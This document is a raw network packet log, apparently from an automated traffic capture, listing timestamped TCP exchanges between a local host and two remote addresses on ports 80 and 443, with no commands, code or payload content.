                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.586617947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.586730003 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.586770058 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.588809967 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.588857889 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.588893890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.588928938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.591171980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.591214895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.591321945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.591353893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.593195915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.593241930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.593302965 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.593344927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.595145941 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.595192909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.595220089 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.595266104 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.597280979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.597325087 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.597352028 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.597388983 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.599400997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.599453926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.599489927 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.599534035 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.601311922 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.601360083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.601469994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.601515055 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.603514910 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.603527069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.603550911 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.603569984 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.605231047 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.605292082 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.605449915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.605514050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.607167959 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.607430935 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.607505083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.609067917 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.609117031 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.609225035 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.609263897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.611053944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.611113071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.611224890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.612561941 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.612926960 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.612978935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.613039017 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.613073111 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.614819050 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.614864111 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.615098000 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.615138054 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.616641045 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.616836071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.616858006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.616911888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.618593931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.618649960 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.618813038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.618855953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.620388031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.620435953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.620704889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.620771885 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.622391939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.622437000 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.622613907 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.622658014 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.624609947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.624660015 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.624670982 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.624692917 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.626072884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.626157045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.626179934 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.626218081 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.627819061 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.627895117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.627945900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.629697084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.629940987 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.629987955 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.631731987 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.631772041 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.631891012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.631978035 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.633435011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.633511066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.633539915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.633596897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.635229111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.635279894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.635401964 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.635446072 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.637176991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.637223959 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.637481928 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.637537956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.638997078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.639255047 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.639307976 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.640984058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.641119003 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.641154051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.642719030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.642765045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.642971039 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.643934011 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.644602060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.644665003 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.644953012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.644996881 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.646423101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.646507025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.646783113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.646845102 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.648302078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.648338079 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.648452044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.648500919 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.650296926 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.650424004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.650563002 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.650762081 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.652282000 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.652352095 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.652410030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.652455091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.653979063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.654026031 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.654328108 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.654460907 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.655734062 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.655777931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.655843019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.655884981 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.657574892 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.657629967 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.657896042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.657970905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.659437895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.659493923 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.659842968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.659878969 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.661323071 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.661370039 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.661432981 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.661470890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.663228989 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.663985014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.663995981 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.664036989 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.665028095 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.665345907 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.665411949 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.665479898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.666868925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.666953087 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.667217016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.667275906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.668843985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.668895006 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.668972969 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.669007063 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.670658112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.670712948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.671238899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.671647072 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.672580004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.672621012 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.672980070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.673019886 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.674325943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.674365997 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.706777096 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.706804991 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.706932068 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.707226992 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.707236052 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.770896912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.770911932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.770956993 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.770987988 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.771568060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.771595955 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.771605968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.771625996 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.772624016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.772809029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.772854090 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.774208069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.774432898 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.774462938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.774477959 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.775546074 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.775597095 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.775979996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.776027918 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.777326107 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.777376890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.777518034 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.777559996 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.778531075 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.778599024 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.778660059 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.779925108 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.779989958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.780453920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.780514956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.781291962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.781351089 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.781718016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.781768084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.782912970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.783011913 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.783174992 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.783216000 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.784383059 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.784401894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.784445047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.785540104 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.785592079 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.785650015 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.786873102 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.786932945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.786986113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.787080050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.788305044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.788506031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.788532019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.788543940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.789556980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.789735079 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.790046930 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.790083885 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.790858030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.790896893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.791047096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.791094065 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.792216063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.792262077 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.792309046 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.792381048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.793543100 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.793626070 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.793941975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.794003010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.794862032 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.794923067 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.795336962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.795391083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.796123028 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.796137094 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.796173096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.797569990 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.797646046 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.798402071 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.798449039 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.799072027 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.799230099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.799351931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.799446106 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.799994946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.800151110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.800164938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.800187111 CET4996980192.168.2.6185.215.113.16
